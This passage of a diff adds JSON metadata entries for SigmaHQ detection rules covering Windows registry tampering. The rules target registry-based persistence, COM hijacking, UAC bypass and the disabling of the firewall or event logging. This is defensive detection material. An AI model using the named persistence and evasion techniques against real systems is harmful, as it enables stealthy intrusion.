"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_defender_firewall.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.004" + ] + }, + "uuid": "974515da-6cc5-4c95-ae65-f97f9150ec7f", + "value": "Disable Microsoft Defender Firewall via Registry" + }, + { + "description": "Detects the addition of the \"Debugger\" value to the \"DbgManagedDebugger\" key in order to achieve persistence. Which will get invoked when an application crashes", + "meta": { + "author": "frack113", + "creation_date": "2022/08/07", + "falsepositive": [ + "Legitimate use of the key to setup a debugger. Which is often the case on developers machines" + ], + "filename": "registry_set_dbgmanageddebugger_persistence.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.hexacorn.com/blog/2013/09/19/beyond-good-ol-run-key-part-4/", + "https://github.com/last-byte/PersistenceSniper", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dbgmanageddebugger_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1574" + ] + }, + "uuid": "9827ae57-3802-418f-994b-d5ecf5cd974b", + "value": "Potential Registry Persistence Attempt Via DbgManagedDebugger" + }, + { + "description": "Detects registry modifications that disable Privacy Settings Experience", + "meta": { + "author": "frack113", + "creation_date": "2022/10/02", + "falsepositive": [ + "Legitimate admin script" + ], + "filename": "registry_set_disable_privacy_settings_experience.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1562.001/T1562.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_privacy_settings_experience.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "0372e1f9-0fd2-40f7-be1b-a7b2b848fa7b", + "value": "Disable Privacy Settings Experience in Registry" + }, + { + "description": "Detects non-sysinternals tools setting the \"accepteula\" key which normally is set on sysinternals tool execution", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/24", + "falsepositive": [ + "Unlikely" + ], + "filename": "registry_set_renamed_sysinternals_eula_accepted.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_renamed_sysinternals_eula_accepted.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1588.002" + ] + }, + "uuid": "8023f872-3f1d-4301-a384-801889917ab4", + "value": "Usage of Renamed Sysinternals Tools - RegistrySet" + }, + { + "description": "Detect modification of TreatAs key to enable \"rundll32.exe -sta\" command", + "meta": { + "author": "frack113", + "creation_date": "2022/08/28", + "falsepositive": [ + "Legitimate use" + ], + "filename": "registry_set_treatas_persistence.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1546.015/T1546.015.md", + "https://www.youtube.com/watch?v=3gz1QmiMhss&t=1251s", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_treatas_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.015" + ] + }, + "uuid": "dc5c24af-6995-49b2-86eb-a9ff62199e82", + "value": "COM Hijacking via TreatAs" + }, + { + "description": "Detects the abuse of the exefile handler in new file association. Used for bypass of security products.", + "meta": { + "author": "Andreas Hunkeler (@Karneades)", + "creation_date": "2021/11/19", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_file_association_exefile.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/mrd0x/status/1461041276514623491", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_file_association_exefile.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "44a22d59-b175-4f13-8c16-cbaef5b581ff", + "value": "New File Association Using Exefile" + }, + { + "description": "Detects tampering with the \"Enabled\" registry key in order to disable windows logging of a windows event channel", + "meta": { + "author": "frack113, Nasreddine Bencherchali", + "creation_date": "2022/07/04", + "falsepositive": [ + "Legitimate administrators disabling specific event log for troubleshooting" + ], + "filename": "registry_set_disable_winevt_logging.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/WhichbufferArda/status/1543900539280293889", + "https://github.com/DebugPrivilege/CPP/blob/c39d365617dbfbcb01fffad200d52b6239b2918c/Windows%20Defender/RestoreDefenderConfig.cpp", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.002" + ] + }, + "uuid": "2f78da12-f7c7-430b-8b19-a28f269b77a3", + "value": "Disable Winevt Event Logging Via Registry" + }, + { + "description": "Detects changes to the \"Default\" property for keys located in the \\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\ registry. Which might be used as a method of persistence\nThe entries found under App Paths are used primarily for the following purposes.\nFirst, to map an application's executable file name to that file's fully qualified path.\nSecond, to pre-pend information to the PATH environment variable on a per-application, per-process basis.\n", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/10", + "falsepositive": [ + "Legitimate applications registering their binary from on of the suspicious locations mentioned above (tune it)" + ], + "filename": "registry_set_susp_app_paths_persistence.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows/win32/shell/app-registration?redirectedfrom=MSDN", + "https://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_app_paths_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.012" + ] + }, + "uuid": "707e097c-e20f-4f67-8807-1f72ff4500d6", + "value": "Suspicious Values In App Paths Default Property" + }, + { + "description": "Detects the modification of the registry to allow a driver or service to persist in Safe Mode.", + "meta": { + "author": "frack113", + "creation_date": "2022/04/04", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_add_load_service_in_safe_mode.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-34---windows-add-registry-value-to-load-service-in-safe-mode-with-network", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-33---windows-add-registry-value-to-load-service-in-safe-mode-without-network", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.001" + ] + }, + "uuid": "1547e27c-3974-43e2-a7d7-7f484fb928ec", + "value": "Registry Persitence via Service in Safe Mode" + }, + { + "description": "Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious", + "meta": { + "author": "Syed Hasan (@syedhasan009)", + "creation_date": "2021/06/18", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_taskcache_entry.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", + "https://labs.f-secure.com/blog/scheduled-task-tampering/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_taskcache_entry.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1053", + "attack.t1053.005" + ] + }, + "uuid": "4720b7df-40c3-48fd-bbdf-fd4b3c464f0d", + "value": "Scheduled TaskCache Change by Uncommon Program" + }, + { + "description": "Adds a RUN key that contains a powershell keyword", + "meta": { + "author": "frack113, Florian Roth", + "creation_date": "2022/03/17", + "falsepositive": [ + "Legitimate admin or third party scripts" + ], + "filename": "registry_set_powershell_in_run_keys.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/frack113/atomic-red-team/blob/a9051c38de8a5320b31c7039efcbd3b56cf2d65a/atomics/T1547.001/T1547.001.md#atomic-test-9---systembc-malware-as-a-service-registry", + "https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_powershell_in_run_keys.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "8d85cf08-bf97-4260-ba49-986a2a65129c", + "value": "Powershell in Windows Run Keys" + }, + { + "description": "Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder", + "meta": { + "author": "Florian Roth, oscd.community", + "creation_date": "2018/07/18", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_susp_reg_persist_explorer_run.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://researchcenter.paloaltonetworks.com/2018/07/unit42-upatre-continues-evolve-new-anti-analysis-techniques/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_reg_persist_explorer_run.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "b7916c2a-fa2f-4795-9477-32b731f70f11", + "value": "Registry Persistence via Explorer Run Key" + }, + { + "description": "Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence via autorun.\nThe disk cleanup manager is part of the operating system.\nIt displays the dialog box […] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.\nAlthough Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.\nInstead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.\nAny developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.\n", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/21", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_disk_cleanup_handler_autorun_persistence.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/", + "https://persistence-info.github.io/Data/diskcleanuphandler.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disk_cleanup_handler_autorun_persistence.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "d4e2745c-f0c6-4bde-a3ab-b553b3f693cc", + "value": "Persistence Via Disk Cleanup Handler - Autorun" + }, + { + "description": "Detects modification to the \"Default\" value of the \"MyComputer\" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example)", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/09", + "falsepositive": [ + "Unlikely but if you experience FPs add specific processes and locations you would like to monitor for" + ], + "filename": "registry_set_persistence_mycomputer.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.hexacorn.com/blog/2017/01/18/beyond-good-ol-run-key-part-55/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_mycomputer.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "8fbe98a8-8f9d-44f8-aa71-8c572e29ef06", + "value": "Persistence Via MyComputer Key and SubKeys" + }, + { + "description": "Detects suspicious new RUN key element pointing to an executable in a suspicious folder", + "meta": { + "author": "Florian Roth, Markus Neis, Sander Wiebing", + "creation_date": "2018/08/25", + "falsepositive": [ + "Software using weird folders for updates" + ], + "filename": "registry_set_susp_run_key_img_folder.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_run_key_img_folder.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "02ee49e2-e294-4d0f-9278-f5b3212fc588", + "value": "New RUN Key Pointing to Suspicious Folder" + }, + { + "description": "Detects the abuse of custom file open handler, executing powershell", + "meta": { + "author": "CD_R0M_", + "creation_date": "2022/06/11", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_custom_file_open_handler_powershell_execution.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://news.sophos.com/en-us/2022/02/01/solarmarker-campaign-used-novel-registry-changes-to-establish-persistence/?cmp=30728", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_custom_file_open_handler_powershell_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ] + }, + "uuid": "7530b96f-ad8e-431d-a04d-ac85cc461fdc", + "value": "Custom File Open Handler Executes PowerShell" + }, + { + "description": "Detect the creation of a service with a service binary located in a suspicious directory", + "meta": { + "author": "Florian Roth, frack113", + "creation_date": "2022/05/02", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_creation_service_susp_folder.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_creation_service_susp_folder.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "a07f0359-4c90-4dc4-a681-8ffea40b4f47", + "value": "Service Binary in Suspicious Folder" + }, + { + "description": "Detects changes to the NGenAssemblyUsageLog registry key.\n.NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section).\nBy simplify specifying an arbitrary value (e.g. fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created.\n", + "meta": { + "author": "frack113", + "creation_date": "2022/11/18", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_net_cli_ngenassemblyusagelog.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_net_cli_ngenassemblyusagelog.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "28036918-04d3-423d-91c0-55ecf99fb892", + "value": "NET NGenAssemblyUsageLog Registry Key Tamper" + }, + { + "description": "Change outlook email security settings", + "meta": { + "author": "frack113", + "creation_date": "2021/12/28", + "falsepositive": [ + "Administrative scripts" + ], + "filename": "registry_set_outlook_security.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/outlook/troubleshoot/security/information-about-email-security-settings", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1137/T1137.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_outlook_security.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1137" + ] + }, + "uuid": "c3cefdf4-6703-4e1c-bad8-bf422fc5015a", + "value": "Change Outlook Security Setting in Registry" + }, + { + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "meta": { + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), wagga (name)", + "creation_date": "2019/10/25", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" + ], + "filename": "registry_set_asep_reg_keys_modification_common.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://persistence-info.github.io/Data/userinitmprlogonscript.html", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_common.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "f59c3faf-50f3-464b-9f4c-1b67ab512d99", + "value": "Common Autorun Keys Modification" + }, + { + "description": "Detects changes to the \"ExtErrorInformation\" key in order to disable ETW logging for rpcrt4.dll", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/09", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_rpcrt4_etw_tamper.yml", + "level": "low", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "http://redplait.blogspot.com/2020/07/whats-wrong-with-etw.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_rpcrt4_etw_tamper.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112", + "attack.t1562" + ] + }, + "uuid": "90f342e1-1aaa-4e43-b092-39fda57ed11e", + "value": "ETW Logging Disabled For rpcrt4.dll" + }, + { + "description": "Detects when a new custom protocole handler is registered", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/05/30", + "falsepositive": [ + "Legitimate applications registering a new custom protocol handler" + ], + "filename": "registry_set_register_custom_protocol_handler.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://ladydebug.com/blog/2019/06/21/custom-protocol-handler-cph/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_register_custom_protocol_handler.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "fdbf0b9d-0182-4c43-893b-a1eaab92d085", + "value": "Newly Registered Protocol Handler" + }, + { + "description": "Detect enable rdp feature to allow specific user to rdp connect on the targeted machine", + "meta": { + "author": "frack113", + "creation_date": "2022/08/19", + "falsepositive": [ + "Legitmate use of the feature (alerts should be investigated either way)" + ], + "filename": "registry_set_allow_rdp_remote_assistance_feature.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "37b437cf-3fc5-4c8e-9c94-1d7c9aff842b", + "value": "Allow RDP Remote Assistance Feature" + }, + { + "description": "Detects when an attacker adds a new \"DLLPathOverride\" value to the \"Natural Language\" key in order to achieve persistence which will get invoked by \"SearchIndexer.exe\" process", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/21", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_natural_language_persistence.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://persistence-info.github.io/Data/naturallanguage6.html", + "https://www.hexacorn.com/blog/2018/12/30/beyond-good-ol-run-key-part-98/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_natural_language_persistence.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "a1b1fd53-9c4a-444c-bae0-34a330fc7aa8", + "value": "Add DLLPathOverride Entry For Persistence" + }, + { + "description": "Detects tampering to RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc\n", + "meta": { + "author": "Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali", + "creation_date": "2022/08/06", + "falsepositive": [ + "Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)" + ], + "filename": "registry_set_terminal_server_tampering.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-190407183310.html", + "https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html", + "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/", + "https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03", + "http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/", + "http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/", + "https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_terminal_server_tampering.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1112" + ] + }, + "uuid": "3f6b7b62-61aa-45db-96bd-9c31b36b653c", + "value": "RDP Sensitive Settings Changed" + }, + { + "description": "Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation.\nA port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/30", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_add_port_monitor.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.010/T1547.010.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_add_port_monitor.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.010" + ] + }, + "uuid": "944e8941-f6f6-4ee8-ac05-1c224e923c0e", + "value": "Add Port Monitor Persistence in Registry" + }, + { + "description": "Detects when an attacker modifies the \"REG_MULTI_SZ\" value named \"Extensions\" to include a custom DLL to achieve persistence via lsass.\nThe \"Extensions\" list contains filenames of DLLs being automatically loaded by lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading.\n", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/21", + "falsepositive": [ + "Unlikely" + ], + "filename": "registry_set_lsa_extension_persistence.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/0gtweet/status/1476286368385019906", + "https://persistence-info.github.io/Data/lsaaextension.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_lsa_extension_persistence.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "41f6531d-af6e-4c6e-918f-b946f2b85a36", + "value": "Persistence Via LSA Extensions" + }, + { + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "meta": { + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "creation_date": "2019/10/25", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" + ], + "filename": "registry_set_asep_reg_keys_modification_office.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_office.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "baecf8fb-edbf-429f-9ade-31fc3f22b970", + "value": "Office Autorun Keys Modification" + }, + { + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "meta": { + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "creation_date": "2019/10/25", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" + ], + "filename": "registry_set_asep_reg_keys_modification_wow6432node_classes.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_classes.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "18f2065c-d36c-464a-a748-bcf909acb2e3", + "value": "Wow6432Node Classes Autorun Keys Modification" + }, + { + "description": "Detects registry modifications that hide internal tools or functions from the user (malware like Agent Tesla, Hermetic Wiper uses this technique)", + "meta": { + "author": "frack113", + "creation_date": "2022/03/18", + "falsepositive": [ + "Legitimate admin script" + ], + "filename": "registry_set_hide_function_user.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hide_function_user.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "5a93eb65-dffa-4543-b761-94aa60098fb6", + "value": "Registry Hide Function from User" + }, + { + "description": "Detects set value ms-msdt MSProtocol URI scheme in Registry that could be an attempt to exploit CVE-2022-30190.", + "meta": { + "author": "Sittikorn S", + "creation_date": "2020/05/31", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_cve_2022_30190_msdt_follina.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/", + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_cve_2022_30190_msdt_follina.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1221" + ] + }, + "uuid": "2d9403d5-7927-46b7-8216-37ab7c9ec5e3", + "value": "Suspicious Set Value of MSDT in Registry (CVE-2022-30190)" + }, + { + "description": "Detects potential COM object hijacking leveraging the COM Search Order", + "meta": { + "author": "Maxime Thiebaut (@0xThiebaut), oscd.community, Cédric Hien", + "creation_date": "2020/04/14", + "falsepositive": [ + "Some installed utilities (i.e. OneDrive) may serve new COM objects at user-level" + ], + "filename": "registry_set_persistence_search_order.yml", + "level": "medium", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://www.cyberbit.com/blog/endpoint-security/com-hijacking-windows-overlooked-security-vulnerability/", + "https://attack.mitre.org/techniques/T1546/015/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_search_order.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.015" + ] + }, + "uuid": "a0ff33d8-79e4-4cef-b4f3-9dc4133ccd12", + "value": "Windows Registry Persistence COM Search Order Hijacking" + }, + { + "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/30", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_uac_bypass_winsat.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_bypass_winsat.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "6597be7b-ac61-4ac8-bef4-d3ec88174853", + "value": "UAC Bypass Abusing Winsat Path Parsing - Registry" + }, + { + "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_set_uac_bypass_wmp.yml", + "level": "high", + "logsource.category": "registry_set", + "logsource.product": "windows", + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_bypass_wmp.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "5f9db380-ea57-4d1e-beab-8a2d33397e93", + "value": "UAC Bypass Using Windows Media Player - Registry" + }, + { + "description": "Detects tampering with attachment manager settings policies attachments (See reference for more information)", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/01", + "falsepositive": [ + "Unlikely" + ], + "filename": 